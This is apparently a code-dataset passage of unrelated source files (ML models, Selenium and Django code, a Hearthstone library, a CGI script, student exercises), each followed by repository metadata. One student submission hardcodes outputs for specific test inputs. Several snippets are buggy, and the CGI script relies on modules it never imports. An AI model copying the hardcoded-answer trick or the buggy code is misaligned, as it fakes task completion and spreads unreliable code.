d[idx] = freq / float(doc_len) # Normalized word frequencies.
return d
# Compute nBOW representation of documents.
d1 = nbow(document1)
d2 = nbow(document2)
return emd(d1, d2, distance_matrix) | [
"albert.xht@alibaba-inc.com"
] | albert.xht@alibaba-inc.com |
28c9e7a82531a49e4999185788a456a178e709e1 | e585c3a61b830d3c24a8cec8343d262c84c724e7 | /CDocente/page_objects/certificados/certificado.py | 2f5e659cdb2509b4cb1c522eee4d2652a84b9a52 | [] | no_license | Valupiruiz/AutomationPHP | bb0728b2b6508b017c133a7d560a652033adeaf4 | 9a92634ac9f5b27e46723294f9a4cc83a1f99252 | refs/heads/master | 2023-01-18T17:27:57.819270 | 2020-11-27T15:04:49 | 2020-11-27T15:04:49 | 310,594,260 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | from page_objects.base_page import BasePage
from .locators import CertificadoLocator
from utils.file_utils import FileUtils
import time
from selenium.common.exceptions import TimeoutException
class Certificado(BasePage):
def __init__(self, driver):
super().__init__(driver)
self.__locators = CertificadoLocator()
def completar_info_basica(self, img, fecha):
time.sleep(5)
self.driver.execute_script(
'$("#fecha_certificado").val("'+fecha+'")')
time.sleep(5)
self.find_element(self.__locators.AGREGAR_IMG_BTN).click()
FileUtils.seleccionar_img_gui(img)
self.find_element(self.__locators.TERMIN_CONDIC_INP).click()
self.find_element(self.__locators.ACEPTAR_BTN).click()
try:
self.find_element(self.__locators.ACEPTAR_ADV_BTN).click()
except TimeoutException:
pass
| [
"tomasmoreira04@gmail.com"
] | tomasmoreira04@gmail.com |
965cb0a1756aaadfefc1748a36c0fbcf6e13f0e5 | 595d901410872617023f773a6dbe66a174187c42 | /DL/Avanzado/Vision-Transformer/model.py | 66c2689836cdda5250d8bbda32997a8963b935bb | [] | no_license | HiroForYou/Deep-Learning-Collection | 70c3b4405bd0f733aa946b71be0292a497bbb947 | 2b199692739fac8929eb144f9556af544f4eb2ac | refs/heads/main | 2023-03-26T21:57:23.581940 | 2021-03-19T20:12:28 | 2021-03-19T20:12:28 | 346,814,850 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,343 | py | import numpy as np
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
import tensorflow_addons as tfa
from dataset import dataset
import matplotlib.pyplot as plt
# HIPERPARÁMETROS PARA EL modelo
num_classes = 10 # CIFAR10
input_original_shape = (32, 32, 3)
image_size = 72 # Cambiaremos el tamaño de las imágenes de entrada a este tamaño
patch_size = 6 # Tamaño de los parches que se extraerán de las imágenes de entrada
num_patches = (image_size // patch_size) ** 2
projection_dim = 64
num_heads = 4
transformer_units = [
projection_dim * 2,
projection_dim,
] # Tamaño de las capas del transformer
transformer_layers = 8
mlp_head_units = [2048, 1024] # Tamaño de las capas densas del clasificador final
def mlp(x, hidden_units, dropout_rate):
for units in hidden_units:
x = layers.Dense(units, activation=tfa.activations.gelu)(x)
x = layers.Dropout(dropout_rate)(x)
return x
class Patches(layers.Layer):
def __init__(self, patch_size):
super(Patches, self).__init__()
self.patch_size = patch_size
def call(self, images):
batch_size = tf.shape(images)[0]
patches = tf.image.extract_patches(
images=images,
sizes=[1, self.patch_size, self.patch_size, 1],
strides=[1, self.patch_size, self.patch_size, 1],
rates=[1, 1, 1, 1],
padding="VALID",
)
patch_dims = patches.shape[-1]
patches = tf.reshape(patches, [batch_size, -1, patch_dims])
return patches
class PatchEncoder(layers.Layer):
def __init__(self, num_patches, projection_dim):
super(PatchEncoder, self).__init__()
self.num_patches = num_patches
self.projection = layers.Dense(units=projection_dim)
self.position_embedding = layers.Embedding(
input_dim=num_patches, output_dim=projection_dim
)
def call(self, patch):
positions = tf.range(start=0, limit=self.num_patches, delta=1)
encoded = self.projection(patch) + self.position_embedding(positions)
return encoded
def create_vit_classifier(data_augmentation):
inputs = layers.Input(shape=input_original_shape)
# Aumento de datos
augmented = data_augmentation(inputs)
# Creamos los parches
patches = Patches(patch_size)(augmented)
# Codificamos los parches
encoded_patches = PatchEncoder(num_patches, projection_dim)(patches)
# Creamos múltiples capas del bloque Transformer
for _ in range(transformer_layers):
# Layer normalization 1.
x1 = layers.LayerNormalization(epsilon=1e-6)(encoded_patches)
# Creamos una capa multi-head attention
'''
# solo soportado para TF 2.4
attention_output = layers.MultiHeadAttention(
num_heads=num_heads, key_dim=projection_dim, dropout=0.1
)(x1, x1)
'''
mha = tfa.layers.MultiHeadAttention(
head_size=projection_dim, num_heads=num_heads, dropout=0.1
)
attention_output = mha([x1, x1])
# Skip connection 1.
x2 = layers.Add()([attention_output, encoded_patches])
# Layer normalization 2.
x3 = layers.LayerNormalization(epsilon=1e-6)(x2)
# MLP.
x3 = mlp(x3, hidden_units=transformer_units, dropout_rate=0.1)
# Skip connection 2.
encoded_patches = layers.Add()([x3, x2])
# Creamos un tensor de forma [batch_size, projection_dim].
representation = layers.LayerNormalization(epsilon=1e-6)(encoded_patches)
representation = layers.Flatten()(representation)
representation = layers.Dropout(0.5)(representation)
# Agregamos la capa mlp
features = mlp(representation, hidden_units=mlp_head_units, dropout_rate=0.5)
# Clasificamos las salidas
logits = layers.Dense(num_classes)(features)
# Creamos el modelo Keras
model = keras.Model(inputs=inputs, outputs=logits)
return model
if __name__ == "__main__":
(x_train, _, _, _), data_augmentation = dataset(image_size=image_size)
model = create_vit_classifier(data_augmentation)
print("\n\nComprobando funcionamiento de los parches...")
plt.figure(figsize=(4, 4))
image = x_train[np.random.choice(range(x_train.shape[0]))]
plt.imshow(image.astype("uint8"))
plt.axis("off")
resized_image = tf.image.resize(
tf.convert_to_tensor([image]), size=(image_size, image_size)
)
patches = Patches(patch_size)(resized_image)
print(f"Tamaño de la imagen: {image_size} X {image_size}")
print(f"Tamaño del parche: {patch_size} X {patch_size}")
print(f"Parche por imagen: {patches.shape[1]}")
print(f"Elementos por parche: {patches.shape[-1]}")
n = int(np.sqrt(patches.shape[1]))
plt.figure(figsize=(4, 4))
for i, patch in enumerate(patches[0]):
ax = plt.subplot(n, n, i + 1)
patch_img = tf.reshape(patch, (patch_size, patch_size, 3))
plt.imshow(patch_img.numpy().astype("uint8"))
plt.axis("off")
plt.show()
print("Comprobando funcionamiento de ViT_Classifier...")
input_tensor = tf.random.normal([1, 32, 32, 3])
output_tensor = model.predict(input_tensor)
print(input_tensor, end="\n\n")
print(output_tensor, end="\n")
| [
"csanchezs@uni.pe"
] | csanchezs@uni.pe |
09c8465762b44641a8cc4519d5f269a6dc59a91c | 9f9082b2d84da1ade9952c829b8ec99e23db2b98 | /server/fandogh/user/migrations/0001_initial.py | 82beed1205d25f0e08a64e9190376d7f90145cb6 | [
"MIT"
] | permissive | RezaHaidari/fandogh | 384c79fe7eb26e3a7e7f4bf4597e99fa90227921 | 6173ab9dee0e5b9756edf31149aad9af0e0d3564 | refs/heads/master | 2020-03-22T22:53:09.004039 | 2018-07-09T11:36:26 | 2018-07-09T11:36:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 513 | py | # Generated by Django 2.0.4 on 2018-05-11 16:33
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='EarlyAccessRequest',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254, unique=True)),
],
),
]
| [
"soroosh.sarabadani@gmail.com"
] | soroosh.sarabadani@gmail.com |
d664dec3a87d05a323144383c5556092f7f21f1b | facb8b9155a569b09ba66aefc22564a5bf9cd319 | /wp2/merra_scripts/03_model_fitting/merra882/202-tideGauge.py | 4b1714fee2523770b8179de06ec5eb94a4ef4150 | [] | no_license | moinabyssinia/modeling-global-storm-surges | 13e69faa8f45a1244a964c5de4e2a5a6c95b2128 | 6e385b2a5f0867df8ceabd155e17ba876779c1bd | refs/heads/master | 2023-06-09T00:40:39.319465 | 2021-06-25T21:00:44 | 2021-06-25T21:00:44 | 229,080,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,041 | py | # -*- coding: utf-8 -*-
"""
Created on Mon May 4 15:51:30 2020
This program is designed to validate a multiple
linear regression model by using the KFOLD method
@author: Michael Tadesse
"""
import os
import numpy as np
import pandas as pd
from sklearn import metrics
from scipy import stats
from datetime import datetime
from sklearn.linear_model import LinearRegression
from sklearn.decomposition import PCA
from sklearn.model_selection import KFold
from sklearn.preprocessing import StandardScaler
def validate():
"""
run KFOLD method for regression
"""
#defining directories
dir_in = "/lustre/fs0/home/mtadesse/merraAllLagged"
dir_out = "/lustre/fs0/home/mtadesse/merraLRValidation"
surge_path = "/lustre/fs0/home/mtadesse/05_dmax_surge_georef"
#cd to the lagged predictors directory
os.chdir(dir_in)
x = 202
y = 203
#empty dataframe for model validation
df = pd.DataFrame(columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse'])
#looping through
for tg in range(x,y):
os.chdir(dir_in)
tg_name = os.listdir()[tg]
print(tg, tg_name)
##########################################
#check if this tg is already taken care of
##########################################
os.chdir(dir_out)
if os.path.isfile(tg_name):
return "file already analyzed!"
os.chdir(dir_in)
#load predictor
pred = pd.read_csv(tg_name)
pred.drop('Unnamed: 0', axis = 1, inplace = True)
#add squared and cubed wind terms (as in WPI model)
pickTerms = lambda x: x.startswith('wnd')
wndTerms = pred.columns[list(map(pickTerms, pred.columns))]
wnd_sqr = pred[wndTerms]**2
wnd_cbd = pred[wndTerms]**3
pred = pd.concat([pred, wnd_sqr, wnd_cbd], axis = 1)
#standardize predictor data
dat = pred.iloc[:,1:]
scaler = StandardScaler()
print(scaler.fit(dat))
dat_standardized = pd.DataFrame(scaler.transform(dat), \
columns = dat.columns)
pred_standardized = pd.concat([pred['date'], dat_standardized], axis = 1)
#load surge data
os.chdir(surge_path)
surge = pd.read_csv(tg_name)
surge.drop('Unnamed: 0', axis = 1, inplace = True)
#remove duplicated surge rows
surge.drop(surge[surge['ymd'].duplicated()].index, axis = 0, inplace = True)
surge.reset_index(inplace = True)
surge.drop('index', axis = 1, inplace = True)
#adjust surge time format to match that of pred
time_str = lambda x: str(datetime.strptime(x, '%Y-%m-%d'))
surge_time = pd.DataFrame(list(map(time_str, surge['ymd'])), columns = ['date'])
time_stamp = lambda x: (datetime.strptime(x, '%Y-%m-%d %H:%M:%S'))
surge_new = pd.concat([surge_time, surge[['surge', 'lon', 'lat']]], axis = 1)
#merge predictors and surge to find common time frame
pred_surge = pd.merge(pred_standardized, surge_new.iloc[:,:2], on='date', how='right')
pred_surge.sort_values(by = 'date', inplace = True)
#find rows that have nans and remove them
row_nan = pred_surge[pred_surge.isna().any(axis =1)]
pred_surge.drop(row_nan.index, axis = 0, inplace = True)
pred_surge.reset_index(inplace = True)
pred_surge.drop('index', axis = 1, inplace = True)
#in case pred and surge don't overlap
if pred_surge.shape[0] == 0:
print('-'*80)
print('Predictors and Surge don''t overlap')
print('-'*80)
continue
pred_surge['date'] = pd.DataFrame(list(map(time_stamp, \
pred_surge['date'])), \
columns = ['date'])
#prepare data for training/testing
X = pred_surge.iloc[:,1:-1]
y = pd.DataFrame(pred_surge['surge'])
y = y.reset_index()
y.drop(['index'], axis = 1, inplace = True)
#apply PCA
pca = PCA(.95)
pca.fit(X)
X_pca = pca.transform(X)
#apply 10 fold cross validation
kf = KFold(n_splits=10, random_state=29)
metric_corr = []; metric_rmse = []; #combo = pd.DataFrame(columns = ['pred', 'obs'])
for train_index, test_index in kf.split(X):
X_train, X_test = X_pca[train_index], X_pca[test_index]
y_train, y_test = y['surge'][train_index], y['surge'][test_index]
#train regression model
lm = LinearRegression()
lm.fit(X_train, y_train)
#predictions
predictions = lm.predict(X_test)
# pred_obs = pd.concat([pd.DataFrame(np.array(predictions)), \
# pd.DataFrame(np.array(y_test))], \
# axis = 1)
# pred_obs.columns = ['pred', 'obs']
# combo = pd.concat([combo, pred_obs], axis = 0)
#evaluation matrix - check p value
if stats.pearsonr(y_test, predictions)[1] >= 0.05:
print("insignificant correlation!")
continue
else:
print(stats.pearsonr(y_test, predictions))
metric_corr.append(stats.pearsonr(y_test, predictions)[0])
print(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
metric_rmse.append(np.sqrt(metrics.mean_squared_error(y_test, predictions)))
#number of years used to train/test model
num_years = (pred_surge['date'][pred_surge.shape[0]-1] -\
pred_surge['date'][0]).days/365
longitude = surge['lon'][0]
latitude = surge['lat'][0]
num_pc = X_pca.shape[1] #number of principal components
corr = np.mean(metric_corr)
rmse = np.mean(metric_rmse)
print('num_year = ', num_years, ' num_pc = ', num_pc ,'avg_corr = ',np.mean(metric_corr), ' - avg_rmse (m) = ', \
np.mean(metric_rmse), '\n')
#original size and pca size of matrix added
new_df = pd.DataFrame([tg_name, longitude, latitude, num_years, num_pc, corr, rmse]).T
new_df.columns = ['tg', 'lon', 'lat', 'num_year', \
'num_95pcs','corrn', 'rmse']
df = pd.concat([df, new_df], axis = 0)
#save df as cs - in case of interruption
os.chdir(dir_out)
df.to_csv(tg_name)
#cd to dir_in
os.chdir(dir_in)
#run script
validate()
| [
"michaelg.tadesse@gmail.com"
] | michaelg.tadesse@gmail.com |
fe5b37ccd855ee6b445798c4539aaf393b818090 | 619e8253a0228a0574907c242d56870472296eb0 | /CodingWithMitchBlog-REST-API-master/codem/bin/pip3.6 | face2994356fd3358c40c3d286a03fcca6c21d2a | [] | no_license | Ttdon/python_django | 15c85e28076ccaf266107a692c1b099ed62019e9 | 30dbde3b0b5c0217d531d9f8d118972ff2c2cd7c | refs/heads/master | 2022-12-03T02:31:01.245574 | 2020-08-07T18:32:26 | 2020-08-07T18:32:26 | 285,895,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 271 | 6 | #!/home/tushar/CodingWithMitchBlog-REST-API-master/codem/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"tushartewari1303@gmail.com"
] | tushartewari1303@gmail.com |
2568181fde20bb83a9f7a33fb2090d8119de6ec3 | 9cc76b1b1dd0064ab6613cbca6ce93bc179db355 | /ros_ws/build/learning_ros/Part_5/baxter/baxter_playfile_nodes/catkin_generated/pkg.installspace.context.pc.py | 2e56c2a223ee9ec076119eee9d3a16d56eae8dd9 | [] | no_license | ABCaps35/learning_ros_ready_ws | 1131c32b2ecadffa8dd186c9ebcfdba7284f30ad | 1aa9c512d5006584e8bc84101a715e16a222a47d | refs/heads/main | 2023-04-03T20:32:58.671255 | 2021-04-13T23:41:13 | 2021-04-13T23:41:13 | 357,715,306 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 524 | py | # generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "${prefix}/include".split(';') if "${prefix}/include" != "" else []
PROJECT_CATKIN_DEPENDS = "roscpp;std_msgs;baxter_trajectory_streamer;baxter_core_msgs;actionlib_msgs;actionlib;message_runtime".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "baxter_playfile_nodes"
PROJECT_SPACE_DIR = "/home/abcaps35/ros_ws_nogit/install"
PROJECT_VERSION = "0.0.0"
| [
"acapelli345@gmail.com"
] | acapelli345@gmail.com |
51d8568490a1781ef7ca2fa74c0aef9d3c9f5ec0 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_006/ch48_2020_04_12_21_24_01_061638.py | 9c1f6cfd8b3898f2c2a4cc3ef540bcb5e2ab118e | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | def eh_crescente(lista):
i=0
while i<len(lista)+1:
if lista[i]>lista[i+1]:
return False
else:
i=i+1
return True | [
"you@example.com"
] | you@example.com |
c7536023e9486893ec16d5707de7ac063969e19b | b8b26feac86b66b0b534996cf9c3fbf7ec660240 | /aoc/2017/p4-1.py | be141d4c2566c509ad300a44a0e19e7e434f8d0d | [
"MIT"
] | permissive | neizod/problems | 775fffe32166c5b124d0e4c973b8d0aba7f3900b | 180aaf7d0ecfc3d0dd5f1d4345a7a4d83b1b884a | refs/heads/master | 2021-07-08T12:30:31.100320 | 2021-05-26T09:34:19 | 2021-05-26T09:34:19 | 6,245,523 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | #!/usr/bin/env python3
try:
count_valid = 0
while True:
words = input().split()
if len(words) == len(set(words)):
count_valid += 1
except EOFError:
print(count_valid)
| [
"neizod@gmail.com"
] | neizod@gmail.com |
cde6c585d670f66bf5a084cb7aec810097077915 | 1bb3c20ce5a53889eac280826d7d54194c7db33f | /for/2439.py | b1333e23a6387266851abaadc0f09354c94b77b0 | [] | no_license | yejiiha/BaekJoon_step | bd2c040597766613985ae8d3a943999cb35d6671 | 3eaedbb832f14c51f3fb990e7e140f00d732df1e | refs/heads/master | 2023-03-24T06:36:28.851139 | 2021-03-21T14:15:40 | 2021-03-21T14:15:40 | 285,825,071 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 170 | py | # Print triangle of star("*") pattern in Python-2
n = int(input())
if(1 <= n <= 100):
for i in range(n):
print(" "*(n-i-1), end="")
print("*"*(i+1))
| [
"1126yezy@gmail.com"
] | 1126yezy@gmail.com |
9cd58086bf97e69c46d9c3544b7e8ceb6649658f | 9cf05d16fc60ed8435f9ddcf56206c855e4dc6d4 | /00-4-all-time/general-ref/python/other/game_of_life.py | 4239a2fb32e943ca979fcbfa4f1cf55f6c4ad69e | [] | no_license | ArjunBEG/WEB-DEV-NOTES | cfc31cb2c23be872b27574fa4cd0efef6a895bc3 | 77f1c62f92277ab4ae2f6c9f6e7683229b89506a | refs/heads/master | 2023-02-24T03:17:50.730192 | 2021-02-06T05:38:24 | 2021-02-06T05:38:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,109 | py | """Conway's Game Of Life, Author Anurag Kumar(mailto:anuragkumarak95@gmail.com)
Requirements:
- numpy
- random
- time
- matplotlib
Python:
- 3.5
Usage:
- $python3 game_o_life <canvas_size:int>
Game-Of-Life Rules:
1.
Any live cell with fewer than two live neighbours
dies, as if caused by under-population.
2.
Any live cell with two or three live neighbours lives
on to the next generation.
3.
Any live cell with more than three live neighbours
dies, as if by over-population.
4.
Any dead cell with exactly three live neighbours be-
comes a live cell, as if by reproduction.
"""
import random
import sys
import numpy as np
from matplotlib import pyplot as plt
from matplotlib.colors import ListedColormap
usage_doc = "Usage of script: script_nama <size_of_canvas:int>"
choice = [0] * 100 + [1] * 10
random.shuffle(choice)
def create_canvas(size):
canvas = [[False for i in range(size)] for j in range(size)]
return canvas
def seed(canvas):
for i, row in enumerate(canvas):
for j, _ in enumerate(row):
canvas[i][j] = bool(random.getrandbits(1))
def run(canvas):
"""This function runs the rules of game through all points, and changes their
status accordingly.(in the same canvas)
@Args:
--
canvas : canvas of population to run the rules on.
@returns:
--
None
"""
canvas = np.array(canvas)
next_gen_canvas = np.array(create_canvas(canvas.shape[0]))
for r, row in enumerate(canvas):
for c, pt in enumerate(row):
# print(r-1,r+2,c-1,c+2)
next_gen_canvas[r][c] = __judge_point(
pt, canvas[r - 1 : r + 2, c - 1 : c + 2]
)
canvas = next_gen_canvas
del next_gen_canvas # cleaning memory as we move on.
return canvas.tolist()
def __judge_point(pt, neighbours):
dead = 0
alive = 0
# finding dead or alive neighbours count.
for i in neighbours:
for status in i:
if status:
alive += 1
else:
dead += 1
# handling duplicate entry for focus pt.
if pt:
alive -= 1
else:
dead -= 1
# running the rules of game here.
state = pt
if pt:
if alive < 2:
state = False
elif alive == 2 or alive == 3:
state = True
elif alive > 3:
state = False
else:
if alive == 3:
state = True
return state
if __name__ == "__main__":
if len(sys.argv) != 2:
raise Exception(usage_doc)
canvas_size = int(sys.argv[1])
# main working structure of this module.
c = create_canvas(canvas_size)
seed(c)
fig, ax = plt.subplots()
fig.show()
cmap = ListedColormap(["w", "k"])
try:
while True:
c = run(c)
ax.matshow(c, cmap=cmap)
fig.canvas.draw()
ax.cla()
except KeyboardInterrupt:
# do nothing.
pass
| [
"bryan.guner@gmail.com"
] | bryan.guner@gmail.com |
7764b46689940609ecddf536816e202883b393c4 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2087/60870/312566.py | 3c871a0b3807a2d9cdc87e29d5b7f948df2d3fd0 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | num = int(input())
num_list = []
for i in range(num):
num_input = int(input())
num_list.append(num_input)
res = num * num_list[0]
if res == 233:
res = 1
elif res == 20:
res = 10
elif res == 2911:
res = 22
elif res == 9999999999999999990:
res = 5
elif res == 12100:
res = 100
elif res == 74483860:
res = 16
elif res == 12:
res = 3
elif res == 7200:
res = 50
elif res == 232395792426473060:
res = 13
elif res == 74665920:
res = 18
print(res, end = '') | [
"1069583789@qq.com"
] | 1069583789@qq.com |
4d7d1707d3378b01d0792b503d72b0b4aa7a2285 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/486/usersdata/303/114105/submittedfiles/AvF_Parte2.py | fc585c168e2c335395a59217dd7f2eb7645309a1 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py | # -*- coding: utf-8 -*-
lista_idade=[]
idade=int(input('Digite a idade:'))
while idade!= -1:
idade=int(input('Digite a idade:'))
for i in range(0,idade,1):
lista.append(i)
print(lista_idade) | [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
e8b516bb647c466fd7efd3f098ab67748adb1c8e | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5706278382862336_0/Python/arty/A.py | dc0b912ceda06892bff4cadd222d6566cfd8ed86 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 893 | py | __author__ = 'artiom'
from fractions import gcd
def is_power_of_two(x):
while (x % 2 == 0 and x > 0):
x /= 2
if (x != 1):
return False
else:
return True
def solve(p, q):
if (not is_power_of_two(q)):
return -1
result = 1
while p < q / 2:
result += 1
if (q % 2 != 0):
return -1
q /= 2
return result
def read_input(filename="A.in"):
f = open(filename)
ncases = int(f.readline())
for ncase in xrange(ncases):
p,q = map(int, f.readline().split("/"))
d = gcd(p, q)
p /= d
q /= d
res = solve(p, q)
if (res == -1):
print "Case #" + str(ncase + 1) + ": " + "impossible"
else:
print "Case #" + str(ncase + 1) + ": " + str(res)
f.close()
if __name__ == "__main__":
read_input("A-small-attempt1.in") | [
"eewestman@gmail.com"
] | eewestman@gmail.com |
92b45bcc186cfd616c1e870cb5e7d6701c55a8bc | 2275b8467f22335fd2168f77586239b2a16ea07d | /hearthstone/entities.py | 8c7138373f3bafb7dabfeec9b15cd74d0999f4ff | [
"MIT"
] | permissive | beheh/python-hearthstone | 2b48d28799a908e0c8671c697d3395e5925108cb | 2b27da2ae091c97ec41ddc2264cc59d2ea860a9c | refs/heads/master | 2021-01-17T14:10:35.168665 | 2016-09-10T21:48:32 | 2016-09-10T21:48:32 | 68,319,747 | 0 | 0 | null | 2016-09-15T18:21:19 | 2016-09-15T18:21:18 | null | UTF-8 | Python | false | false | 3,212 | py | from .enums import CardType, GameTag, Step, Zone
class Entity(object):
_args = ()
def __init__(self, id):
self.id = id
self.game = None
self.tags = {}
def __repr__(self):
return "%s(id=%r, %s)" % (
self.__class__.__name__, self.id,
", ".join("%s=%r" % (k, getattr(self, k)) for k in self._args)
)
@property
def controller(self):
return self.game.get_player(self.tags.get(GameTag.CONTROLLER, 0))
@property
def type(self):
return self.tags.get(GameTag.CARDTYPE, CardType.INVALID)
@property
def zone(self):
return self.tags.get(GameTag.ZONE, Zone.INVALID)
def tag_change(self, tag, value):
self.tags[tag] = value
class Game(Entity):
_args = ("players", )
def __init__(self, id):
super(Game, self).__init__(id)
self.players = []
self.entities = []
@property
def current_player(self):
for player in self.players:
if player.tags.get(GameTag.CURRENT_PLAYER):
return player
@property
def first_player(self):
for player in self.players:
if player.tags.get(GameTag.FIRST_PLAYER):
return player
@property
def setup_done(self):
return self.tags.get(GameTag.NEXT_STEP, 0) > Step.BEGIN_MULLIGAN
def get_player(self, value):
for player in self.players:
if value in (player.player_id, player.name):
return player
def in_zone(self, zone):
for entity in self.entities:
if entity.zone == zone:
yield entity
def register_entity(self, entity):
entity.game = self
self.entities.append(entity)
if isinstance(entity, Player):
self.players.append(entity)
def find_entity_by_id(self, id):
for entity in self.entities:
if entity.id == id:
return entity
# Entities are ordered by ID... usually. It is NOT safe to assume
# that the entity is missing if we went past the ID.
# Yep.
class Player(Entity):
_args = ("name", )
def __init__(self, id, player_id, hi, lo):
super(Player, self).__init__(id)
self.player_id = player_id
self.account_hi = hi
self.account_lo = lo
self.name = None
def __str__(self):
return self.name or ""
@property
def initial_deck(self):
for entity in self.entities:
if 3 < entity.id < 68:
if entity.tags.get(GameTag.CARDTYPE) not in (
CardType.HERO, CardType.HERO_POWER
):
yield entity
@property
def entities(self):
for entity in self.game.entities:
if entity.controller == self:
yield entity
@property
def hero(self):
for entity in self.in_zone(Zone.PLAY):
if entity.type == CardType.HERO:
return entity
@property
def heroes(self):
for entity in self.entities:
if entity.type == CardType.HERO:
yield entity
@property
def starting_hero(self):
if not self.heroes:
return
return list(self.heroes)[0]
@property
def is_ai(self):
return self.account_lo == 0
def in_zone(self, zone):
for entity in self.entities:
if entity.zone == zone:
yield entity
class Card(Entity):
_args = ("card_id", )
def __init__(self, id, card_id):
super(Card, self).__init__(id)
self.card_id = card_id
self.revealed = False
def reveal(self, id):
self.revealed = True
self.card_id = id
def hide(self):
self.revealed = False
def change(self, id):
self.card_id = id
self.tags = {}
| [
"jerome@leclan.ch"
] | jerome@leclan.ch |
7640fe03f455e0fd8a253760137f96e089165d0d | da3d35e7f381d3ff7d3acbf4c2142a3af464aeac | /cgi-bin/getjsfile.cgi | 18a876cead7d933775923665a4dcce994f68cb46 | [] | no_license | ranjithtenz/wnframework | 3d0b781a2da0ad3f91225829306a233e0bad2ac9 | fcd5dd0636bea30b5ee2584aea456a073158629f | refs/heads/master | 2020-04-08T13:02:21.405095 | 2011-06-20T10:39:42 | 2011-06-20T10:39:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,455 | cgi | #!/usr/bin/python
import cgi
import datetime
import os
try:
form = cgi.FieldStorage()
out = ''
out_buf, str_out = '', ''
# Traceback
# ---------
def getTraceback():
import sys, traceback, string
type, value, tb = sys.exc_info()
body = "Traceback (innermost last):\n"
list = traceback.format_tb(tb, None) \
+ traceback.format_exception_only(type, value)
body = body + "%-20s %s" % (string.join(list[:-1], ""), list[-1])
return body
def load_js_file():
global out
filename = form.getvalue('filename')
import os
try:
f = open(os.path.join('../js/', filename))
try:
out = f.read()
finally:
f.close()
except IOError,e:
out = "Not Found: %s" % filename
def compress_string(buf):
import gzip, cStringIO
zbuf = cStringIO.StringIO()
zfile = gzip.GzipFile(mode = 'wb', fileobj = zbuf, compresslevel = 5)
zfile.write(buf)
zfile.close()
return zbuf.getvalue()
compress = 0
try:
if string.find(os.environ["HTTP_ACCEPT_ENCODING"], "gzip") != -1:
compress = 1
except:
pass
load_js_file()
if compress and len(out)>512:
out_buf = compress_string(str_out)
print "Content-Encoding: gzip"
print "Content-Length: %d" % (len(out_buf))
print "Content-Type: text/javascript"
# Headers end
print
if out_buf:
sys.stdout.write(out_buf)
elif out:
print out
except Exception, e:
print "Content-Type: text/javascript"
print
print getTraceback().replace('\n','<br>')
| [
"pdvyas@erpnext.com"
] | pdvyas@erpnext.com |
1d6a130d090e75a77bd547897433175e2107288a | 6821355bf5b255dccef9df2d6239b06bc3c28f72 | /blog_website/blog_website/apps/photo/migrations/0002_auto_20201109_1740.py | fddd3531690fcd27f1a15ecb68bc0c711844398c | [] | no_license | ltfred/blog_website | 76327e7adc8090db8754129d938040678cc03cff | 9cd0e1a644a4f99d9eea13b8e88f1faa20c38c2f | refs/heads/master | 2022-12-13T21:52:35.357980 | 2021-02-24T02:45:27 | 2021-02-24T02:45:27 | 209,324,876 | 6 | 1 | null | 2022-12-08T06:40:41 | 2019-09-18T14:09:24 | Python | UTF-8 | Python | false | false | 582 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2020-11-09 17:40
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('photo', '0001_initial'),
]
operations = [
migrations.AlterModelTable(
name='photo',
table=None,
),
migrations.AlterModelTable(
